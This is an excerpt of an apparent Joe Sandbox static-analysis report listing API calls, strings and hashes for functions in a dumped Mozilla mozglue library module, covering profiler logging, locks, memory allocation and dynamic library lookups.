                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F559
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50F561
                                                • Part of subcall function 6C5094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5094EE
                                                • Part of subcall function 6C5094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C509508
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F577
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F585
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50F5A3
                                              Strings
                                              • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C50F56A
                                              • [I %d/%d] profiler_resume_sampling, xrefs: 6C50F499
                                              • [I %d/%d] profiler_resume, xrefs: 6C50F239
                                              • [I %d/%d] profiler_pause_sampling, xrefs: 6C50F3A8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                              • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                              • API String ID: 2848912005-2840072211
                                              • Opcode ID: d9a63e9a58dff90fb01f69cb2f5356f3b8ac0a45bb3971f76358a0bf2a76deb0
                                              • Instruction ID: 2b3052891a18d23a7d5df33f911ed10935070a0530c10b3cf389263afb6e1379
                                              • Opcode Fuzzy Hash: d9a63e9a58dff90fb01f69cb2f5356f3b8ac0a45bb3971f76358a0bf2a76deb0
                                              • Instruction Fuzzy Hash: B8F05475700604ABDA007B699C48E5E77BDFBC636DF018125EA05C3702DF754C058769
                                              APIs
                                              • LoadLibraryW.KERNEL32(kernel32.dll,6C4D0DF8), ref: 6C4D0E82
                                              • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C4D0EA1
                                              • __Init_thread_footer.LIBCMT ref: 6C4D0EB5
                                              • FreeLibrary.KERNEL32 ref: 6C4D0EC5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                              • String ID: GetProcessMitigationPolicy$kernel32.dll
                                              • API String ID: 391052410-1680159014
                                              • Opcode ID: 0cddcb07232f23cc89c99f99547f35af47b87aee4177e50d8975d67aedbec9be
                                              • Instruction ID: fe56ce4e1197641ac4705fdc57a2a53fd203793b14b246a45dc0112d59f57663
                                              • Opcode Fuzzy Hash: 0cddcb07232f23cc89c99f99547f35af47b87aee4177e50d8975d67aedbec9be
                                              • Instruction Fuzzy Hash: C10128747003829BDA00FFACCC24E4A77B5E74631EF12AA29991183F40D778B4158A99
                                              APIs
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F619
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C50F598), ref: 6C50F621
                                                • Part of subcall function 6C5094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5094EE
                                                • Part of subcall function 6C5094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C509508
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50F637
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8,?,?,00000000,?,6C50F598), ref: 6C50F645
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8,?,?,00000000,?,6C50F598), ref: 6C50F663
                                              Strings
                                              • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C50F62A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                              • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                              • API String ID: 2848912005-753366533
                                              • Opcode ID: b5f161e81e13fa887bf0d108d45e07506d74a5f01c2da64dcb027a6cfddbb168
                                              • Instruction ID: 86e8ee6dbd8609c81644699270b934fd08783778288be7a0d0b8a3bbf5d8bf34
                                              • Opcode Fuzzy Hash: b5f161e81e13fa887bf0d108d45e07506d74a5f01c2da64dcb027a6cfddbb168
                                              • Instruction Fuzzy Hash: A9F05EB5300604ABDA007B699C48E5E7BBDFBC63ADF028125EA05C3741DB764C058769
                                              APIs
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C4FCFAE,?,?,?,6C4C31A7), ref: 6C5005FB
                                              • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C4FCFAE,?,?,?,6C4C31A7), ref: 6C500616
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C4C31A7), ref: 6C50061C
                                              • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C4C31A7), ref: 6C500627
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: _writestrlen
                                              • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                              • API String ID: 2723441310-2186867486
                                              • Opcode ID: d869b72dd1a64f056b4960ae2392d498c2a3ad1d88914688784376ca4dcab4ad
                                              • Instruction ID: 35b68ec0123640f4d859d563af2b5e6557d69b1b0021558d62292067341bb464
                                              • Opcode Fuzzy Hash: d869b72dd1a64f056b4960ae2392d498c2a3ad1d88914688784376ca4dcab4ad
                                              • Instruction Fuzzy Hash: C5E08CF2A0202037F614329AAC86DBB771CDBC6238F080139FD0D86301FA4ABD1A51F6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b5732296efe9e88c0415566e161609517f1a6eb9806de7974ea1641d1cb3d36
                                              • Instruction ID: 143b14a6d71ecdc3ec57e02fd311b2114621d529b550c848358e1b1caff929c3
                                              • Opcode Fuzzy Hash: 7b5732296efe9e88c0415566e161609517f1a6eb9806de7974ea1641d1cb3d36
                                              • Instruction Fuzzy Hash: 84A14970A016058FDB24DF29C994E9AFBF1BF89304F45866ED44A9BB00E730B945CF90
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C5214C5
                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5214E2
                                              • GetCurrentThreadId.KERNEL32 ref: 6C521546
                                              • InitializeConditionVariable.KERNEL32(?), ref: 6C5215BA
                                              • free.MOZGLUE(?), ref: 6C5216B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                              • String ID:
                                              • API String ID: 1909280232-0
                                              • Opcode ID: 14c205e7d0c5fd1a70283c04237eb4f4a875840426e9c83977a5839aa04b108a
                                              • Instruction ID: 6a01d7556556729a70349054305534f8d9bd7be4324790dfd786a3c48d84ddfb
                                              • Opcode Fuzzy Hash: 14c205e7d0c5fd1a70283c04237eb4f4a875840426e9c83977a5839aa04b108a
                                              • Instruction Fuzzy Hash: FF61DC32A007009BDB21DF24CC84BDFB7B0BF8A308F45851CE98A57A41EB35E949CB91
                                              APIs
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C519FDB
                                              • free.MOZGLUE(?,?), ref: 6C519FF0
                                              • free.MOZGLUE(?,?), ref: 6C51A006
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C51A0BE
                                              • free.MOZGLUE(?,?), ref: 6C51A0D5
                                              • free.MOZGLUE(?,?), ref: 6C51A0EB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$StampTimeV01@@Value@mozilla@@
                                              • String ID:
                                              • API String ID: 956590011-0
                                              • Opcode ID: 234fbf9ba884508a85ed3e1f49e618db8fb9995e72cfd636afbdd04c251e9dde
                                              • Instruction ID: 5db0c2c442c8da3af8a0c8e274126bbb3af2dd816ab35b3dc3779843b143daac
                                              • Opcode Fuzzy Hash: 234fbf9ba884508a85ed3e1f49e618db8fb9995e72cfd636afbdd04c251e9dde
                                              • Instruction Fuzzy Hash: C761A1754086419FD712CF18C48096AB3F5FF88329F55865DE8999BB02E731E98ACBC1
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C51DC60
                                              • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C51D38A,?), ref: 6C51DC6F
                                              • free.MOZGLUE(?,?,?,?,?,6C51D38A,?), ref: 6C51DCC1
                                              • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C51D38A,?), ref: 6C51DCE9
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C51D38A,?), ref: 6C51DD05
                                              • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C51D38A,?), ref: 6C51DD4A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                              • String ID:
                                              • API String ID: 1842996449-0
                                              • Opcode ID: cdd8cec13b183ed930ab16a7d517fd1a926a65740a4c7d1dcb12247aea9cf91c
                                              • Instruction ID: 03e09721a9cf37a11d222fe2963ea07249b913b740fb655f094c60e5d47a6a3f
                                              • Opcode Fuzzy Hash: cdd8cec13b183ed930ab16a7d517fd1a926a65740a4c7d1dcb12247aea9cf91c
                                              • Instruction Fuzzy Hash: 7C4169B5A00605DFDB00DFA9C88499ABBF6FF8D318B564969D945ABB10DB31FC00CB90
                                              APIs
                                              • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C51C82D
                                              • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C51C842
                                                • Part of subcall function 6C51CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C53B5EB,00000000), ref: 6C51CB12
                                              • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C51C863
                                              • std::_Facet_Register.LIBCPMT ref: 6C51C875
                                                • Part of subcall function 6C4FB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C53B636,?), ref: 6C4FB143
                                              • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C51C89A
                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C51C8BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                              • String ID:
                                              • API String ID: 2745304114-0
                                              • Opcode ID: e084dbb328058c7050739a9324c4f0726a6846389239495839814cce29f2955b
                                              • Instruction ID: 2cc50f9344a2bb2bb9b9a8d542efc4cae0b280289b36fc03b0915099d9e50aaa
                                              • Opcode Fuzzy Hash: e084dbb328058c7050739a9324c4f0726a6846389239495839814cce29f2955b
                                              • Instruction Fuzzy Hash: F1119371B002099FCB00FFA4CCC89AF7BB4EF89358F014169E51697741EB31A905CB95
                                              APIs
                                              • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C4FF480
                                                • Part of subcall function 6C4CF100: LoadLibraryW.KERNEL32(shell32,?,6C53D020), ref: 6C4CF122
                                                • Part of subcall function 6C4CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C4CF132
                                              • CloseHandle.KERNEL32(00000000), ref: 6C4FF555
                                                • Part of subcall function 6C4D14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C4D1248,6C4D1248,?), ref: 6C4D14C9
                                                • Part of subcall function 6C4D14B0: memcpy.VCRUNTIME140(?,6C4D1248,00000000,?,6C4D1248,?), ref: 6C4D14EF
                                                • Part of subcall function 6C4CEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C4CEEE3
                                              • CreateFileW.KERNEL32 ref: 6C4FF4FD
                                              • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C4FF523
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                              • String ID: \oleacc.dll
                                              • API String ID: 2595878907-3839883404
                                              • Opcode ID: db0949b294790dffa09c150d159dc6fb414ac054064411a5e881b8ca7925c53f
                                              • Instruction ID: 268e2b8b0262dc60cccce4bb6e91bc8c35580fbaebc3fe602c85d67afd67e18b
                                              • Opcode Fuzzy Hash: db0949b294790dffa09c150d159dc6fb414ac054064411a5e881b8ca7925c53f
                                              • Instruction Fuzzy Hash: 0341C7306097109FE721DF68C884F9BB7F4AF85329F105A1CF5A483651EB74D94ACB92
                                              APIs
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4D4A68), ref: 6C50945E
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C509470
                                                • Part of subcall function 6C509420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C509482
                                                • Part of subcall function 6C509420: __Init_thread_footer.LIBCMT ref: 6C50949F
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50E047
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C50E04F
                                                • Part of subcall function 6C5094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5094EE
                                                • Part of subcall function 6C5094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C509508
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C50E09C
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C50E0B0
                                              Strings
                                              • [I %d/%d] profiler_get_profile, xrefs: 6C50E057
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                              • String ID: [I %d/%d] profiler_get_profile
                                              • API String ID: 1832963901-4276087706
                                              • Opcode ID: 5fbed856cd8dcbe8ba97ab6693203f5f82db99cd310bf38ee64147eabc767132
                                              • Instruction ID: 9e19b4c91b1fda301abefdddf049e29dc7286228722ec7ccc905ea224f021a5a
                                              • Opcode Fuzzy Hash: 5fbed856cd8dcbe8ba97ab6693203f5f82db99cd310bf38ee64147eabc767132
                                              • Instruction Fuzzy Hash: 9721BE74B011089FDF00EF64DC68AAEB7B5AF8530CF644428E94AD7740EB71A909C7E1
                                              APIs
                                              • SetLastError.KERNEL32(00000000), ref: 6C527526
                                              • __Init_thread_footer.LIBCMT ref: 6C527566
                                              • __Init_thread_footer.LIBCMT ref: 6C527597
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer$ErrorLast
                                              • String ID: UnmapViewOfFile2$kernel32.dll
                                              • API String ID: 3217676052-1401603581
                                              • Opcode ID: b36290d7e69ae84678802804bd4d3201c15cd1fdd481878b1f663ca78486a837
                                              • Instruction ID: 14b0e56374ce7327633ed522419325f8eca7441631df31cc26190fe3d18b469d
                                              • Opcode Fuzzy Hash: b36290d7e69ae84678802804bd4d3201c15cd1fdd481878b1f663ca78486a837
                                              • Instruction Fuzzy Hash: 85212531700501A7CB18EFECCC14E4A77B5EB863A9F02862DD90187B80D73CB802C69A
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C54F770,-00000001,?,6C53E330,?,6C4EBDF7), ref: 6C52A7AF
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C4EBDF7), ref: 6C52A7C2
                                              • moz_xmalloc.MOZGLUE(00000018,?,6C4EBDF7), ref: 6C52A7E4
                                              • LeaveCriticalSection.KERNEL32(6C54F770), ref: 6C52A80A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
                                              • String ID: accelerator.dll
                                              • API String ID: 2442272132-2426294810
                                              • Opcode ID: 422e12302c69f146a6b900583bb58d62006dc40a6cef689d69387069cc060211
                                              • Instruction ID: 6f11044ecac010915e727cce3e0e140992af04e8d3fe90df9613b75bb926c215
                                              • Opcode Fuzzy Hash: 422e12302c69f146a6b900583bb58d62006dc40a6cef689d69387069cc060211
                                              • Instruction Fuzzy Hash: 8601A2716003049FEB04EF99DC84D157BF8FB8A328706C16AE9098B742DB74AC00CBA4
                                              APIs
                                              • LoadLibraryW.KERNEL32(ntdll.dll,?,6C52748B,?), ref: 6C5275B8
                                              • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C5275D7
                                              • FreeLibrary.KERNEL32(?,6C52748B,?), ref: 6C5275EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: RtlNtStatusToDosError$ntdll.dll
                                              • API String ID: 145871493-3641475894
                                              • Opcode ID: 5fef1a269267b47ee7bb0e20d9baa35a5c7b9ba4ddaae2d90b295bd82f3090fa
                                              • Instruction ID: a10fde7c7eca7bd7d8d91417d25bad8cca9375c9d8ac91f8ec9613812546805e
                                              • Opcode Fuzzy Hash: 5fef1a269267b47ee7bb0e20d9baa35a5c7b9ba4ddaae2d90b295bd82f3090fa
                                              • Instruction Fuzzy Hash: 09E09271605701ABEB00BFAACC48B05BEF8EB8735CF12D225A915D2641EBBC8061CF19
                                              APIs
                                              • LoadLibraryW.KERNEL32(ntdll.dll,?,6C527592), ref: 6C527608
                                              • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C527627
                                              • FreeLibrary.KERNEL32(?,6C527592), ref: 6C52763C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
